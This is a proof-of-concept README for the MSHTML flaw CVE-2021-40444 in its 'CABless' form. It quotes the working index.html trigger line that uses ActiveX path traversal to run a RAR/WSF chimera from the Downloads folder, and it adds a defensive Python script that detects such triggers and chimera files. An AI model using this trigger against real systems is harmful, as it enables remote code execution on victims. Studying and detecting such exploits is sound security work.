
CVE-2021-40444 PoC — Microsoft MSHTML.DLL Path Traversal Vulnerability

Source
Related vulnerability
Title: Microsoft MSHTML.DLL Path Traversal Vulnerability (CVE-2021-40444)
Description: Microsoft MSHTML.DLL is a dynamic link library from Microsoft (USA) used to parse HTML; applications such as IE, Outlook and Outlook Express use it. Microsoft MSHTML.DLL has a path traversal vulnerability: a remote attacker can craft a specially constructed Office document carrying a malicious ActiveX control, lure the victim into opening the document, and execute arbitrary code on the system.
Description
Modified code so that we don't need to rely on CAB archives
Introduction
# CVE-2021-40444--CABless version
Update: Modified code so that we don't need to rely on CAB archives
The file `index.html` that triggers payload execution contains only one line of code, inside a `script` tag:

```html
<script>new ActiveXObject('htmlfile').Script.location='.wsf:../../../Downloads/cabless.rar?.wsf';</script>
```

The target path walks three directory levels up into the user's Downloads folder, where the merged RAR/WSF file is assumed to have been saved; the `.wsf:` prefix and the `?.wsf` suffix are what make that file be treated as a Windows Script File rather than as an archive.
An article in PDF format is provided.

Update: link to video demo -> https://www.youtube.com/watch?v=V9XD3VboEcU

Note: The sample RAR file does NOT contain a Word document designed to exploit the vulnerability, as I have taken as reference one of the PoCs posted on GitHub. Instead, it just merges WSF and RAR data to demonstrate the path described in the article, so the file can be parsed as both RAR and WSF (chimera).
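Triage logic for the two artifacts this README describes, as an added example (not code from the CABless repository or its author): it looks for the `htmlfile` / `.wsf:` trigger line in an HTML file, and for a blob that starts with a RAR signature yet also carries a WSF `<job>`/`<script>` body, which is the "chimera" shape the note above describes. The RAR magic bytes are the documented RAR 4.x and RAR 5.x signatures; the chimera sample is constructed for the example and makes no claim about how the repository's Sample.rar is actually laid out. All function and variable names are mine.

```python
"""Heuristic triage for CVE-2021-40444 'CABless' artifacts.

Added example: it does not build or run the exploit, it only recognises
its two tell-tale pieces so a defender can classify files offline.
"""
import re
from typing import Optional

# Documented archive signatures: RAR 4.x (7 bytes) and RAR 5.x (8 bytes).
RAR4_MAGIC = b"Rar!\x1a\x07\x00"
RAR5_MAGIC = b"Rar!\x1a\x07\x01\x00"

# A WSF file is XML for Windows Script Host: a <job> root holding <script> blocks.
WSF_JOB_RE = re.compile(rb"<job\b", re.IGNORECASE)
WSF_SCRIPT_RE = re.compile(
    rb"<script\b[^>]*language\s*=\s*[\"']?(jscript|vbscript)", re.IGNORECASE
)

# The index.html trigger quoted in the README: an 'htmlfile' ActiveX object whose
# .Script.location is pointed at a '.wsf:' pseudo-path.
HTML_TRIGGER_RE = re.compile(
    r"new\s+ActiveXObject\(\s*['\"]htmlfile['\"]\s*\)\s*\.Script\.location\s*=\s*['\"]"
    r"(?P<target>\.wsf:[^'\"]*)['\"]",
    re.IGNORECASE,
)
TRAVERSAL_RE = re.compile(r"(?:\.\./|\.\.\\)")


def classify_blob(data: bytes) -> dict:
    """Report whether the bytes look like a RAR, a WSF script, or both (chimera)."""
    is_rar = data.startswith(RAR4_MAGIC) or data.startswith(RAR5_MAGIC)
    has_wsf = bool(WSF_JOB_RE.search(data)) and bool(WSF_SCRIPT_RE.search(data))
    return {"rar": is_rar, "wsf": has_wsf, "chimera": is_rar and has_wsf}


def find_html_trigger(html: str) -> Optional[dict]:
    """Locate the htmlfile/.wsf: trigger and describe the path it points at."""
    m = HTML_TRIGGER_RE.search(html)
    if not m:
        return None
    target = m.group("target")
    return {
        "target": target,
        "traversal": bool(TRAVERSAL_RE.search(target)),
        "depth": len(TRAVERSAL_RE.findall(target)),   # number of '../' hops
        "wsf_suffix": target.lower().endswith(".wsf"),
    }


# Constructed sample: the one-line index.html quoted in the README.
SAMPLE_INDEX_HTML = (
    "<script>new ActiveXObject('htmlfile').Script.location="
    "'.wsf:../../../Downloads/cabless.rar?.wsf';</script>"
)

# Constructed stand-in for a RAR/WSF chimera: RAR 4 signature, filler, then a
# WSF <job>. This is NOT the repository's Sample.rar (hypothetical layout).
SAMPLE_CHIMERA = (
    RAR4_MAGIC
    + b"\x00" * 32
    + b'<job id="x"><script language="JScript">WScript.Echo("hi");</script></job>'
)

# Constructed plain RAR header with no script body, for contrast.
SAMPLE_PLAIN_RAR = RAR4_MAGIC + b"\x00" * 32


if __name__ == "__main__":
    print("index.html trigger:", find_html_trigger(SAMPLE_INDEX_HTML))
    print("chimera blob:", classify_blob(SAMPLE_CHIMERA))
    print("plain rar:", classify_blob(SAMPLE_PLAIN_RAR))
```

The HTML check is deliberately narrow (it keys on the exact `htmlfile` + `.Script.location` + `.wsf:` combination) so it produces few false positives; the blob check is the broader one, because any file that begins with an archive signature and also contains a parseable `<job>` body is worth a second look regardless of which sample it came from.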
File snapshot

[4.0K] /data/pocs/69844be2651bbe46b4540da5bbf57bb82a62e9fb
├── [311K] MS_Windows_CVE-2021-40444 - 'Ext2Prot' Vulnerability 'CABless' version.pdf
├── [ 740] README.md
└── [ 199] Sample.rar

0 directories, 3 files